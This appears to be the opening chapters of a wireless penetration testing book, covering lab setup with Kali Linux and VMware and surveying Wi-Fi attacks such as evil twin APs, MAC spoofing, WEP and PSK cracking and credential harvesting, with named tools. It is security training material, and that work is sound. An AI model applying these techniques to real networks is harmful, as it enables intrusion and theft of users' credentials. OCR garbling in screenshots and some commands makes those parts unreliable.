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Preface 


Since it is simple to access the Internet without a network cable from a variety of locations 
worldwide, wireless technology has grown in popularity. However, a wireless network may not 
always be secure if you are unaware of its risks and, more importantly, if security measures are 
not performed. For your own safety, it is crucial to safeguard your wireless network. Over the 
past few years, there has been an increase in identity theft and the theft of personal information. 


Insecure wireless networks are no longer safe since there is a higher chance that your personal 
information may be stolen, despite the fact that they are simpler to set up and connect to. 
Another person with little to no experience can intercept it with ease. Another option for a user to 
keep tabs on your online activity, includes an unprotected wireless network. This includes 
conversations, emails, and even your online banking account. Although this book offers ways to 
safeguard wireless networks, it mostly concentrates on how an attacker can access a protected 
wireless network. Additionally, it demonstrates the power an attacker has, once they have access 
to a wireless network. 


This book is divided into 12 chapters. They will cover wireless Network basics, basics and 
advances in wireless penetration testing. The details are listed as follows. 


Chapter 1 will cover step-by-step directions for setting up your own wireless lab. It will also 
cover the fundamentals of installing Kali on your hard drive and experimenting with virtual 
machines (VMWare). This chapter will provide knowledge about wireless penetration testing 
tools, such as Wireshark and Aircrack-ng. It will discuss how to use the Web interface to 
configure your access point. 


Chapter 2 will cover a complete understanding of numerous different wireless attack strategies, 
such as access control attacks, confidential attacks, credential attacks, and authentication attacks. 


Chapter 3 will discuss how to scan wireless networks for information, as well as show two 
different forms of wireless scanning and how they function. The chapter will then show how to 
use Ettercap to sniff wireless networks using ARP poisoning and how to use dsniff to gather 
login details. Finally, it will cover a variety of ways to defend yourself against these attacks. 


Chapter 4 will show how to make a plan for an attack. Next, it will cover several methods for an 
attack. Then, the chapter will discuss detailed information on WEP, WPA, and WPA2 
encryption. Finally, it will cover learn several ways to reduce the risk of a wireless attack. 


Chapter 5 will illustrate why it is important to find the number of live hosts when conducting a 
penetration test on a network. Next, it will cover identifying hosts on the network with Kali 
Linux. Lastly, the chapter will cover determining network size. 


Chapter 6 will cover the ability to plan out an assessment, the key components of an assessment, 
and the step-by-step process of an assessment. It will cover the ability to install Nessus, register 
it, download plugins, and then run Nessus. The chapter will also discuss the ability to create a 
new policy and scan, identify vulnerabilities, read the vulnerability details, and follow it up with 
a solution for the vulnerability. 


Chapter 7 will cover learn how to capture unencrypted traffic and gain an understanding of 


honeypot attacks and methods, Karmetasploit, Jasager, and prevention from threats. 


Chapter 8 will cover the basics of conducting advanced attacks using wireless, where it will 
create a setup for a MITM attack over wireless and then use it to eavesdrop on the victim’s 
traffic. Then, the chapter will discuss how the same setup can be used to hijack the application 
layer of the victim (Web traffic, to be specific) using a DNS poisoning attack as well as how to 
use Metasploit. Finally, will discuss the prevention of these threats. 


Chapter 9 will cover the ability to learn how to use first and double pivoting to investigate 
hidden networks and the mitigations methods. 


Chapter 10 will cover understanding Android architecture in detail, how to set up an android 
penetration testing environment and know the popular android penetration testing tools. Finally, 
it will discuss how to protect your Android applications. 


Chapter 11 will cover the ability to understand the basics of iOS applications, iOS application 
sandboxing structure and the popular iOS penetration testing tools. Finally, the chapter will go 
over the testing methodology of the iOS application. 


Chapter 12 will cover the ability to understand how to write a professional penetration testing 
report. 
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CHAPTER 1 
Wireless Penetration Testing Lab Setup 


Introduction 


This book provides useful information to protect you. We cannot guarantee your 100% safety. It 
provides what administrators need to understand about the potential security threats that can 
occur at any time. As you know, there are risks while dealing with data, as anyone can access the 
data that is unauthorized to access it. 


This chapter will focus on the benefits of advanced wireless penetration testing and the skills 
needed to use it so that you will understand the upcoming chapters. There are also key factors in 
this chapter that must be understood, such as understanding Kali Linux, knowledge of wireless 
cards, and some important tools that must be used. 


Question: Why do we test for penetration in wireless networks? 


Answer: 


e To avoid network data breaches that cost organizations millions of dollars because of 
viruses, worms, Trojan horses, and illegal activities, wireless penetration testing helps us 
avoid these risks before they occur. 


e To assess security vulnerabilities in terms of importance, we can rank or identify the most 
important threats to the organization and prevent attacks before they occur. 


e To set regulations and policies to protect employees. 


The best benefit of wireless penetration testing is security awareness, as it is very important to 
understand how attackers penetrate these networks and what they can do just to gain access to 
them. 


Question: What are attackers looking for on your system or network? Is the data valuable or 
not? 


Always ask yourself in the form of What if? For example, why would an attacker gain access to 
his online bank account? Could he buy anything? What if the attacker obtains security clearance 
for your workplace? Could he cause harm to your business? These are just a few examples. 


Remember that this book is designed to focus on advanced wireless hacking news. It will focus 
on understanding the hidden principles behind various attacks on wireless networks. You will 
learn the following: 


e Detailed understanding of wireless network security. 


e How to find weaknesses in wireless networks and how to introduce different types of Wi- 
Fi attacks. It will also explain the best security practices to follow when setting up a 
wireless network. 


Question: Who should read this book? 


Answer: Who will be interested in this book? Certainly not for everyone, but I hope it will be for 
most network administrators or information security professionals. This book will provide hack 
prevention methods in nearly every chapter. I think prevention coverage is very important 
because you will not only know how to protect yourself but also the threats that exist in the real 
world. 


All large or small wireless networks serve the same use, which is access to a network via a 
wireless frequency (without cable), whether the device is a computer or a mobile phone. 
In our society today, we see more users being hacked, especially in Wi-Fi networks. There 
may be some problems in Wi-Fi networks, such as there may be an open wireless 
network, there may be weak encryption, or they are maybe minor authentication 
problems. 


Structure 


In this chapter, we will discuss the following topics: 


e Hardware requirements 

e Software requirements 

e¢ Downloading and installing Kali Linux 
e Wireless penetration testing tools 

e Configuring an access point setting 

e Installing Wireless Adaptor 


e Connecting to the access point 


Objectives 


This chapter gives you step-by-step directions for setting up your own wireless lab. You will also 
learn the fundamentals of installing Kali on your hard drive and experimenting with virtual 
machines (VMWare) and take some knowledge about wireless penetration testing tools such as 
Wireshark and Aircrack-ng. You will also learn how to use the Web interface to configure your 
access point. Finally, you will learn how to configure and use your wireless adaptor, and you 
must first learn and perform numerous commands for verifying the status of the wireless client’s 
connection to the access point. 


Hardware requirements 


To set up the wireless lab, we will need the following hardware: 


e Two laptops with internal Wi-Fi cards: In our lab, we will use one laptop as the victim 
and the other as the penetration tester’s laptop. Though practically any laptop will do, 
laptops with at least 4 GB of RAM are preferred because our trials may include a lot of 
memory-intensive software. 


e One Wireless Adapters: Depending on your laptop’s wireless card, we may require a 
USB Wi-Fi card that supports packet injection and sniffing, which Kali supports. The Alfa 
AWUSO36H card from Alfa Networks appears to be the best option. Refer to Figure 1.1: 


Figure 1.1: Alfa AWUS036H wireless adaptor 


The TP-Link N150 Wireless High Gain USB Adapter (TLWN722N), as shown in Figure 1.2, 
Panda 300Mbps Wireless N USB Adapter, and Edimax EW7711UAN are all smaller and slightly 
less expensive alternatives. 


Figure 1.2: TLWN722N wireless adaptor 


e One access point: Any access point that supports the encryption technologies 
WEP/WPA/WPA2 will suffice. For the purposes of example in this book, we will be 
using a NETGEAR D1500 Wireless router. 

e An active internet connection: This will assist with research, software downloads, and 
some of our experiments. 


Software requirements 
To set up the wireless lab, we will need the following software: 
e Virtual machine platforms such as VMware or VirtualBox: Because of their 


widespread use, virtualization software is a desirable alternative for setting up your testing 
machine on a virtualized platform. The bother of dual booting the computer is eliminated 


by virtualization software, which offers a robust set of functions at a low price. Cloning 
virtual machines, which allows you to make numerous clones of the same system, is 
another practical function that the majority of virtualization software products offer. In a 
practical penetration test, you may need to clone and replicate your testing computer in 
order to install more hacking tools and update Kali Linux configuration settings, 
preserving a copy of the earlier image to be used as a base image in a virtualized 
environment. This is pretty simple to accomplish. 


e Kali Linux: The official website for Kali is https://www.kali.org/, where you may 
download the program. You should be able to get the program directly from the website 
because it is open source. 


e Windows 7/Windows 8/Windows 8.1/Windows 10/Windows 11: On one of the laptops, 
you will need to have Windows 7, Windows 8, Windows 8.1, Windows 10, or Windows 
11 installed. For the remainder of the book, this laptop will serve as the victim machine. 


It is worth noting that while we are testing on a Windows-based OS, the concepts we have 
learned may be applied to any Wi-Fi-capable device, including smartphones and tablets, 
as we will discuss toward the end of the book (Chapter 11: iOS Penetration Testing and 
Chapter 12: Reporting). 


Downloading and installing Kali Linux 


Kali Linux (formerly known as BackTrack Linux) is an open-source, Debian-based Linux 
distribution aimed at advanced penetration testing and security auditing. Kali Linux contains 
several hundred tools targeted toward various information security tasks, such as penetration 
testing, security research, computer forensics, and reverse engineering. Kali Linux is a multi- 
platform solution, accessible and freely available to information security professionals and 
hobbyists. 


Kali Linux was released on March 13, 2013, as a complete, top-to-bottom rebuild of BackTrack 
Linux, adhering completely to Debian development standards. Let us get started with the Kali 
Linux download and installation if your machine is 64-bit, as shown in Figure 1.3. Where we 
will use a 64-bit Kali Linux Machine; else, if your machine is 32-bit, you need to download Kali 
Linux 32-bit, and you can install the Kali Linux 32-bit like 64-bit on a Virtual machine platform. 


Kali Linux download procedure (we recommend the image marked Installer) is as shown in 
Figure 1.3: 


Kali Linux 2021.3 Changelog « 


SD = zi Apple M1 


—- 


=> => 


Weekly instaner NetInstaller 


Complete offline installation 


Untested images with the All packages are downloaded 
lat ae with customization ncoaitatin: 
atest update during installato 
repository sum = A torrent sum L torrent 


Figure 1.3: Kali Linux download 


Installing Kali Linux inside VMware (Guest VM) step-by-ste 
To install Kali Linux inside VMware (Guest VM), follow the given steps: 


1. Upon starting up VMware Workstation, select Create a New Virtual Machine, as 
shown in Figure 1.4: 


Home - VMware Workstation 


My Computer 


= Shared VMs 


~~» = 


= = 


Opena Connect to 

Virtual a 

Machine Remote 
Machine Server 


Figure 1.4: Create a new virtual machine 


2. Select Custom (advanced) for the Virtual Machine Configuration when you have the 
option, as this will provide us with greater control over the VM creation. Refer to Figure 
LS: 


x OG New Virtual Machine Wizard 


Welcome to the New Virtual Machine Wizard 


What type of configuration do you want? 


WV Virtual Machine Configuration 


Typical (recommended) 
VM VERSE : 


WORKSTATION 


C 


ify compatibility 


Figure 1.5: Virtual machine configuration 


The next screen is Virtual Machine Hardware Compatibility, in which we use 
Workstation 8.x, as shown in Figure 1.6: 


x GO New Virtual Machine Wizard 
Choose the Virtual Machine Hardware Compatibility 


Which hardware features are needed for this virtual machine? 


VW Virtual Machine Hardware Compatibility 


Hardware c atibility 


VM VaARE 


WORKSTATION Ww 8.x v 


Se 


ESXi 6.7 U2 64 GB memory 

ESXi 6.7 

ESXi 6.5 work adapters 

ESXi 6.0 2 TB disk size 

ESXi 5.5 No SATA devi 

ESXi 5.1 No NVMe 

ESXi 5.0 

Fusion 11.x No virtual camera support 
Fusion 10.x No DirectX 10 support 
Fusion 8.x No l|OMMU support 
Fusion 7.x No VBS support 

Fusion 6.x No Trusted Platform Module 
Fusion 5.x 

Fusion 


Workstation 15.x 


Figure 1.6: Virtual machine hardware compatibility 


4. If this is your first time using the wizard, you may be presented with the following 
prompt, which explains how adding vMware tools can improve your VM experience. 
Before pressing close, you might want to check the Don’t show this page again box 
after reading and comprehending the page, as shown in Figure 1.7: 


New Virtual Machine Wizard 


Virtual Machine Created 


Virtual machine created successfully. You still need to install the operating system and 
VMware Tools. 


WV Install the Guest Operating System 


VM VaAReE 
WORKSTATION 


ee 


1 for a physical computer 


for details 


.Fromt nenu bar, se M > 


See the for details 
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Figure 1.7: Install VMware tools 


By choosing Edit virtual machine settings, we may now edit the VM’s settings 
before it starts up, as shown in Figure 1.8: 


*% O — Kal Linux-VMware Workstation 


& Kali Linux 


® Kali Linux 


s Sour 
& Printer 
= Dis 


spla 
pray 


» Description 


¥ Virtual Machine Details 


State: 
Configuration file: /h 


Hardware compatibility: 
Primary IP address: 


Figure 1.8: Edit virtual machine settings 


6. We have no use for a printer; therefore, we get rid of it. To remove a printer, go to the 
Printer section and hit Remove, as shown in F : 


Virtual Machine Settings 


Hardware 


Device Status 


@ Memor 
® Process 
K(SCSI) 80GB 
es ; P P This 
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Figure 1.9: Remove the printer device 


7. If you want to change how USB devices behave, you can change the USB settings. We 
have turned off Automatically connect new USB devices (this option may not be 
available depending on your VMware version) and turned on Show all USB input 
devices, as shown in Figure 1.10: 


X 0 VirtualMachine Settings 


Hardware 


Connections 


Figure 1.10: USB settings 


8. There is one more thing to mention in the Display section. Make sure Accelerated 3D 
graphics is turned off, as it has been documented to create problems, as shown in Figure 
1.11: 


x O Virtual Machine Settings 


Hardware 


3D Graphics 


Acceler 


Monitors 


® Use host settings for monitc 
ome/kali/Down 


Specify settings for monitor 


Figure 1.11: Display settings 


Next, we will go to the Options menu and scroll down to Power. We chose to allow 
Report battery information to guests since it is a useful feature for Kali users who 
use laptops or notebooks, as shown in Figure 1.12: 


Virtual Machine Settings 


Options 


Power Options 


r powering on 


ding 


otect Disabled 
solation 
Not encrypted 


Time synco 


Not supported 


Figure 1.12: Power options 


10. We choose Always enable under Shared folders do not reveal any paths at this time, as 
some users may not want to, as shown in Figure 1.13: 


Virtual Machine Settings 


Options 


Folder Sharing 


B General 


solation 
Control Not encrypted 
Time sync off 


Disabled 


© Autologin Not supported 


% Advanced 


Figure 1.13: Folder sharing settings 


11. Finally, we enable Synchronize guest time with host in the VMware Tool option, as 
shown in Figure 1.14: 


Virtual Machine Settings 


Options 


VMware Tools Features 


ize quest time wi 


Disabled 


Not encrypted 


ools is running 


Figure 1.14: VMware tools features 


12. After that, we save, start the VM, and then continue installing Kali Linux using the 
Graphical Install option, as shown in 


Kali Linux installer menu (BIOS mode) 


Install 

Advanced options | 
Accessible dark contrast installer 
Help 

Install with speech sunthesis 


Figure 1.15: Kali Linux graphical install 


Wireless penetration testing tools 


The following sections describe various useful and widely used security tools. 


Wireshark 


Wireshark is a packet analyzer that is both free and open source. It can be used for network 
troubleshooting, analysis, software development, and communications protocol development. 
Wireshark may also be used as a teaching tool to demonstrate the importance of using SSL or 
other encryption methods to safeguard sensitive information like usernames and passwords from 
being captured by an outside attacker. Kali Linux comes with Wireshark pre-installed. 


How can Wireshark be of assistance to you? Wireshark can sniff wireless packets, follow 
TCP streams, and discover unwanted wireless access points to obtain access to e-mails, 


passwords, and other sensitive information. 


Figure 1.16 shows the Wireshark interface: 


test.pcap - Wireshark 
File Edt Yiew Go Capture Analyze Statistics Help 
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Flags: 0x00 

Fragment offset: 0 
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Figure 1.16: Wireshark 


Scapy 


Scapy is a packet manipulation application with a lot of capabilities. It is capable of forging or 
decoding packets from a wide range of protocols. It transmits packets, captures them, compares 


requests, and responds. Scanning, tracerouting, probing, assaults, and network discovery are all 
easy activities that it can readily do. Hoping, 85% of Nmap, arpspoof, tcpdump, tethereal, pOf, 
and other tools might be readily replaced. It can also handle a variety of other jobs that other 
programs cannot, such as sending incorrect frames, injecting your own 802.11 frames, 
combining VLAN hopping, ARP cache poisoning, WEP VOIP decoding, and more. Scapy is 
shown in action with Kali Linux, as shown in Figure 1.17: 


Figure 1.17: Scapy 


Nmap 


Nmap is a network discovery and security auditing tool that is free and open source. It is useful 
for activities such as network inventory, scheduling service upgrade schedules, and monitoring 
host or service uptime for many systems and network managers. Nmap is a tool that may be used 
to detect Linux operating system versions and binary packages. It can also detect whether a 
network port is open or closed. Kali Linux comes with Nmap pre-installed. 


Nmap is a network and subnet mapping tool. It can also tell you what operating systems and 
software versions you are running. This can assist in determining whether the network has a flaw 
or a potential security issue. Nmap is shown in action with Kali Linux, as shown in Figure 1.18: 


File Actions Edit View Help 


Figure 1.18: Nmap 


Aircrack-ng is a C-based software that interfaces with a security auditing suite. Airodump-ng, 
aircrack-ng, aireplay-ng, Nmap, dnsiff, arpspoof, urlsnarf, and more utilities are included in 
Aircrack-ng. Although Aircrack-ng has the potential to be used maliciously, it can also be used 
to recover forgotten Wi-Fi passwords. For security pros, Aircrack-ng is an excellent tool. Not 
just to mention that it is completely pos to use and distribute! Kali Linux comes with Aircrack- 
ng pre-installed, as shown in 


(C) 2006-2020 Thomas d'Otreppe 
w.aircrack-ng.org 


ack-ng [options] <input 


Figure 1.19: Aircrack-ng 


Metasploit is a Ruby-based software that helps to reduce the risk of data breaches. It can use the 
same approaches as an outside attacker to find weaknesses in your network and systems. 
Metasploit can find thousands of flaws in a wide range of systems and software. Kali Linux 
comes with Metasploit already installed, as shown in Figure 1.20. 


What role does Metasploit play in wireless penetration testing? Metasploit contains a 
vulnerability database. If a wireless router has a vulnerability that can be exploited by 
bypassing the admin login, Metasploit will almost certainly have a Ruby script for it. It 
also works on operating systems and hardware firewalls, so it is not just for wireless 
routers. Metasploit’s search command can be used to find CVEs. 
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Figure 1.20: Metasploit 


Configuring an access point setting 


We are going to set up the access point now. As previously stated, all of the experiments in this 
book will be conducted using the NETGEAR D1500 Wireless Router. You may, however, use 
any other access point. The core operating and usage principles remain the same. 


With an SSID of Wireless Lab, we will configure the access point to use Open Authentication. 
Follow the given steps: 


1. Connect your laptop to one of the access point’s Ethernet ports with an Ethernet cable 
after turning on the access point. 


2. In your browser, type the IP address of the access point configuration terminal. The 
default IP address for the NETGEAR is 192.168.1.1. The IP address of your access point 
can be found in the setup guide for your access point. If you do not have the access point’s 
manuals, you can use a Web browser to access the router at http://routerlogin.net. The 
access point’s IP address is usually used as the gateway IP address. You should see a 
configuration portal that looks like this once you’ve connected. Refer to Figure 1.21: 


€ C © 192168.1.1 


Sign in 


Figure 1.21: Wireless router login 


Both the username and password are admin by default. You must reset the router to its 
default configuration settings if you are unable to access it. To do this, push the button on 
the back of the wireless router for 5 seconds, and the router will be reset to its default 
settings. 


3. To rename the SSID to Wireless Lab, navigate to the Wireless tab, then Wireless 
Settings. Figure 1.22 is an example. 


4. As previously stated, the access point’s security settings must be changed to Open 
Authentication. Select None from the Wireless menu, then Security options. The 
access point is in Open Authentication Mode if security is disabled (see Figure 1.22). 


5. Save the changes to the access point and, if necessary, reboot it. Your access point should 
now be operational using the SSID Wireless Lab. 
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Figure 1.22: Wireless router settings 


We have successfully configured our access point with a Wireless Lab SSID. It is announcing its 
presence, which is picked up by our Windows laptop and others within the access point’s Radio 
Frequency (RF) range. 


It is worth noting that we set up our access point in Open mode, which is the least secure option. 
For the time being, it is not recommended to connect this access point to the internet because 
anyone within the RF range will be able to use it to access the internet. 


Installing wireless adaptor 


Our wireless adaptor is significantly easier to set up than the access point. The benefit is that Kali 
comes pre-installed with all the necessary device drivers to enable packet injection and sniffing 
right out of the box. The wireless adaptor will be used with the penetration tester’s laptop. To set 
up your card, follow these instructions step by step: 


1. Plugin the adaptor into one of the Kali laptop’s USB ports and boot it. Once you log in, 
open a console terminal and type in iwconfig. Your screen should look as shown in 


Figure 1.23: 


Figure 1.23: iwconfig command 


2. As you can see, the wireless adapter’s wireless interface is named wlano. To bring up the 
interface, type ifconfig wlan, as shown in Figure 1.24: 


Figure 1.24: ifconfig wlan0 command 


3. 1¢:bf:ce:89:8c:e2 should be the same as the MAC address listed on your wireless 
adapter. 


Connecting to the access point 


Now, we will look at how to use the wireless adapter to connect to the access point. Wireless Lab 
is the SSID of our access point, and it does not use any authentication. To connect your wireless 
adaptor to the access point, follow these steps: 


Let us have a look at the wireless networks that our adaptor can currently identify. You can get a 
list of nearby networks by running the command iwlist wlan0 scanning. 


1. Continue scrolling down until you see the Wireless Lab network listed. It is detected as 
Cell 01 in my configuration; it may be different from yours. The network name is stored 
in the ESSID field, as shown in Figure 1.25: 


Figure 1.25: iwlist wlan0 scanning command 


2. To check the status, run the commands iwconfig wlano essid “Wireless Lab” and 

iwconfig wlano. If you successfully connected to the access point, the MAC address of 
the access point should appear in the Access Point: field of the iwconfig output, as shown 
in : 


Figure 1.26: iwconfig wlanO essid “Wireless Lab” command 


3. According to the documentation, the access point’s management interface IP address is 
192.168.1.1. Alternatively, when we configured the access point, this was the default 
router IP address. Let us use the ifconfig wlanO 192.168.1.3 netmask 255.255.255.0 
up command to set our IP address in the same subnet. Type afcontzg wlan0 and review 
the output to see if the command worked, as shown in 


Figure 1.27: ifconfig wlan0 192.168.1.3 netmask 255.255.255.0 command 


4. Now, use the ping 192.168.1.1 command to ping the access point. The answers from the 
access point should De visible if the network connection has been correctly set up, as 
shown in 


Figure 1.28: Ping command 


We may check connectivity on the access point by looking at the connection logs. The 
MAC address of the wireless card 1c:bf:ce:89:8c:e2 has been logged making DHCP 
requests from the router, as shown in the accompanying log, as shown in Figure 1.29: 
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Figure 1.29: Wireless router attached devices 
Conclusion 


This chapter gave you step-by-step directions for setting up your own wireless lab. You also 
learned the fundamentals of installing Kali on your hard drive and experimenting with virtual 
machines (VMWare) and take some knowledge about wireless penetration testing tools such as 
Wireshark and Aircrack-ng. You also learned how to use the Web interface to configure your 
access point. Finally, you learned how to configure and use your wireless adaptor, and you must 
first learn and perform numerous commands for verifying the status of the wireless client’s 
connection to the access point. 


Now, you are ready to move on to Chapter 2: Wireless Attacking Techniques and Methods. 


uestions 


1. Mention the famous adapters that are used in the wireless penetration testing process. 
2. What is Kali Linux? 
3. Mention the famous tools that are used in the wireless penetration testing process. 


CHAPTER 2 
Wireless Attacking Techniques and Methods 


Introduction 


In this second chapter of the book, we will presume that you either enjoyed the first chapter so 
much that you opted to keep reading or skipped it because you were satisfied with what you 
already knew. So, here is your first question, in any case. The usual person will get a wireless 
router but will not set up any wireless security. What makes you think that? 


Of course, you already know this, but it is because the average user may be unaware of the 
device’s security features or safeguards, or they may be computer knowledgeable but unfamiliar 
with how to implement wireless security. This is where Wi-Fi Protected Setup (WPS) comes 
in. 


WPS simplifies the setup of a wireless home network. The user simply presses a button on the 
wireless router, and the router configures a secure network for the user automatically. Isn’t that 
fantastic? Wrong! Most typical wireless routers are vulnerable to brute-force assaults. A WPS 
PIN is usually only a series of integers. Using brute-force approaches, an attacker can retrieve or 
crack the WPS PIN in just a few hours due to this security weakness. 


Users are not the only ones that do this; businesses and ISPs are as well. They will just plug in 
the wireless router and push the WPS button, after which they will write down the key for you. 
This is terrible security, especially for a company network! Please change the username, modify 
the default password, disable remote management, and activate the firewall. 


Structure 


In this chapter, we will discuss the following topics: 


e Access control attacks 
e Confidential attacks 
e Credential attacks 


e Authentication attacks 


Objectives 


This chapter gives you a complete understanding of numerous different wireless attack 
Strategies, such as access control attacks, confidential attacks, credential attacks, and 
authentication attacks. The important thing to remember here is to be aware of the dangers we 
face when connecting to wireless access points and the internet. 


Access control attacks 


WLAN access control measures such as AP MAC filters and 802.11 port access controls are 
used in access control attacks to enter a network via wireless or to evade WLAN access control, 
as shown in Figure 2.1: 


Figure 2.1: WLAN access control 


The following sections demonstrate some access control attacks. 


War driving 


War driving is a hacking method and has its origins in the movie War Games, which starred 
actor Matthew Broderick. In the movie, Broderick’s character dials every phone number in his 
local area to discover all existing computers. That evolved into a process of mapping access 
points, which involves attackers finding vulnerable or unsecured Wi-Fi networks. War driving 
was termed by computer security consultant Peter Shipley, who developed software that can 
interact with portable Global Positioning Systems (GPS). Simply, War driving is the process of 
locating wireless LANs by listening for beacons or issuing probe requests, which serves as a 
launchpad for subsequent attacks. This attack can be carried out with tools such as Airmon-ng, 
DStumbler, KisMAC, and NetStumbler. War driving normally involves two people: one driving 
the car and the other scanning the surroundings for wireless networks. They can set up GPS 
settings to locate these Wi-Fi spots and preserve them for future wireless attacks with the right 
software and applications, as shown in Figure 2.2: 


Figure 2.2: War driving diagram 


Rogue access points 


Any wireless access point (AP) that is placed on a network without authorization, and hence, is 
not maintained by the network administrator is known as a rogue access point (AP). Rogue 
access points are not protected in the same way that normal access points are. They are 
particularly dangerous because they are physically hidden behind a network firewall, allowing 
anyone with access to the AP to obtain access to the whole network. Rogue APs can be plugged 
directly into a firewall or network switch, a wall connection, or even other network devices and 
can be installed maliciously by an attacker or simply by an employee looking for their own Wi- 
Fi access. Rogue access points, on the other hand, can be used for several assaults, including 
denial of service, data theft, and malware deployment, as shown in Figure 2.3: 


Figure 2.3: Rouge access point 


Ad hoc associations 


Ad hoc connection assaults are a particularly nasty sort of attack in which the attacker (malicious 
user) uses a third-party legitimate user as a man-in-the-middle between the attacker’s device and 
the AP or other type of gateway. 


The Ad hoc wireless network capability, which is essential for device-in-the-middle operations, 
may be deployed on both Windows and Linux computers and enables the establishment of ad- 
hoc (peer-to-peer) wireless links between client devices (without any additional network 
infrastructure such as AP). What you do behind the scenes is to build a virtual software AP on 
your PC, and the second device associates with the SSID you created (effectively making 
wireless links). 


An Ad hoc attack would be described in the following scenario, as shown in Figure 2.4. Let us 
pretend the attacker is one of Computers 2, 3, or 4. Computer 1 would be the victim (man-in-the- 
middle). This laptop will be the one that is running and providing wireless connectivity to the 
surrounding area and has another interface connected to the wired network for internet access. 


Attackers might connect to Computer 1’s WLAN and then use it to route all traffic to the internet 
through this victim’s PC. From the perspective of the internet, Computer 1 appears to be the 
source of the traffic! Wireless linkages from Computer 1 to all attackers do not have to be Wi-Fi 
connections; they could be Bluetooth or any other sort of wireless technology that is supported 
by all parties involved in the communication attempt. 


Refer to Figure 2.4: 
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Figure 2.4: Ad hoc associations 


MAC spoofing 


A MAC spoofing attack is where the intruder sniffs the network for valid MAC addresses and 
attempts to act as one of the valid MAC addresses where the attacker has full network access 
through the wireless access point. This type of assault is popular at paid hotspots such as hotels, 
airports, coffee shops, and other paid Internet venues. The MAC spoofing attack is depicted in 
Figure 2.5: 
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Figure 2.5: MAC spoofing 


802.11 RADIUS cracking 


Although we do not hear much about this attack, it is an essential topic to discuss. In this assault, 
the attacker uses brute force to obtain a Remote Authentication Dial-In User Service 
(RADIUS) secret from an 802.11 access request for malevolent purposes. On a LAN network 
between the AP and a RADIUS server, any packet capture tool will work. Because many APs, 
servers, and even software services will ask for a RADIUS login, it is quite risky. The attacker 
can acquire access to anything that requires RADIUS to approve access if RADIUS is 
compromised. This assault is depicted in Figure 2.6: 
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Figure 2.6: 802.11 RADIUS cracking 


Confidential attacks 


These attacks try to intercept private data transferred over wireless networks, whether it is sent in 
clear text or encrypted using 802.11 or higher layer protocols. 


The following sections discuss various private attacks. 


Eavesdropping 


Of course, we all understand what eavesdropping is, but do you understand what it implies in 
terms of security? When it comes to computer security, eavesdropping means capturing data, 
decoding it, and then obtaining potentially sensitive information. It is the same as listening to it 
on a phone call. You listen to the talk, record it, and then extract potentially sensitive information 
from it. Ettercap, Kismet, and Wireshark are all capable of this. The attack is depicted in Figure 
2; 
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Figure 2.7: Eavesdropping 


WEP key cracking 


It is finally time to talk about WEP cracking! It is exactly what it sounds like: using passive or 
active methods to capture data to recover a WEP key. WEP encryption can now be hacked in less 
than 5 minutes with today’s improved hardware and software! WEP encryption should only be 
used if the old gear is still in use; otherwise, WPA2 encryption should be utilized. These attacks 
can be carried out using tools such as Aircrack-ng, AirSnort, Airoway, chopchop, and 
dwepcrack. An example of WEP key cracking is seen in Figure 2.8: 


Figure 2.8: WEP Key cracking 


Evil twin AP 


Have you ever heard of an AP with an evil twin? A rogue access point is like an evil twin AP. To 
trick consumers into thinking it is a trusted wireless network, the attacker establishes a fake 
wireless AP. Because the beacons are faster and closer in range, they intensify their signal to the 
point where the client will instantly connect to them. The most common evil twin attack scenario 
you may come across in the wild is one with Captive Portals such as Starbucks, Airport, and 
Hotels where These attacks can be carried out via Honeypot, CqureAP, D-Link G200, 
HermesAP, Rogue Squadron, and WifiBSD. The following image depicts a common tool, as 
shown in Figure 2.9: 
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Figure 2.9: Evil twin AP 


AP phishing 


To phish for logins, bank accounts, and credit card details, the attacker operates a phony Web 
portal or Web server on a false AP. Because ordinary users will not see the attack happening to 
them, this is by far one of the most hazardous and frightening attacks to encounter. They will 
think it is the actual website, but the attacker is merely waiting for them to check in so he can 
steal their data on the other side. These attacks can be carried out with tools such as Airpwn, 


Airsnarf, Hotspotter, Karma, and RGlueAP, as shown in Figure 2.10: 
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Figure 2.10: AP phishing 


Man-in-the-middle attack 


You might have heard of this attack tactic before; if you have not, you will now! An attacker 
intercepts network traffic between you and another target in a man-in-the-middle attack. On a 
wired or wireless network, the attacker might get usernames and passwords, examine e-mails, 
view HTTP sessions of websites, and much more. These attacks can be carried out with tools 
such as dsniff, Ettercap-NG, and sshmitm. This attack is depicted in Figure 2.11: 
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Figure 2.11: MITM attack 


Credential attacks 


Have you ever heard of or dealt with a person whose online accounts were hacked? Most likely, 
this user has been a victim of a credential attack in which an attacker has stolen their login 
credentials. This can be accomplished with the use of a Web server or tools such as the Social 
Engineering Toolkit (SET). The attacker can clone a website and make it appear genuine and 
reputable to fool the user into signing in. They have no idea that someone suddenly has complete 
access to their data. The credential harvester and phishing attack methods will be discussed in the 
following sections. 


Credential harvester 


This technique launches an Apache server on the attacker’s PC to clone a website and make it 
appear authentic. The attacker might connect to a wireless access point and use DNS spoofing to 
send HTTP requests to a bogus website. The website will appear to be the same as the real 
website when the user tries to log in normally. On the attacker’s end, the attacker will have 
access to the user’s username and password, as well as the user’s IP address. From here, the 
attacker could continue collecting account logins, which he or she could subsequently save in a 
report. It is critical to conduct social engineering assaults on your company’s employees to see if 
they follow processes and security standards. This can be seen in Figure 2.12: 
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Figure 2.12: Credential harvester 


Phishing 

So, what exactly is phishing, and how do we spot a phishing attempt, a fraud, or a hoax? 
Phishing is a deceptive method of obtaining personal information such as usernames, passwords, 
social security numbers, phone numbers, and credit card numbers. These assaults are frequently 
detected by sending an e-mail to a user instructing them to visit a website for information 
updates, password changes, or information verification. The easiest approach to avoid being a 
victim of a phishing scam is to understand how they work. An e-mail from an unknown source 
requesting your password or changing your password is most likely a fraudulent e-mail. These e- 
mails will need to be blocked or marked as spam or phishing. If you suspect you have been a 
victim of phishing, update your passwords, as shown in Figure 2.13: 
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Figure 2.13: Phishing 


Authentication attacks 


Authentication attacks are used by attackers to steal valid user identities and credentials to gain 
access to private networks and services. The following sections describe some authentication 
attacks. 


Shared key guessing 


Using vendor default credentials or shared key generators, the attacker tries to guess 802.11 
shared key authentications. All shared keys should not be left as defaults and should be changed 
as soon as the device is set up and configured. This attack can be carried out using any cracking 
tool, such as Aircrack-ng, as shown in Figure 2.14: 
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Figure 2.14: Shared key guessing 


PSK cracking 


Using a dictionary attack tool, the PSK cracking technique recovers a WPA/WPA2 PSK from 
collected key handshake frames. The encryption strength of the WPA/WPA2 key is crucial in 
this attack. If the key is extremely difficult to crack, it could take weeks, which may not be worth 
a hacker’s time. When making your own passwords, use a combination of letters, numbers, and 
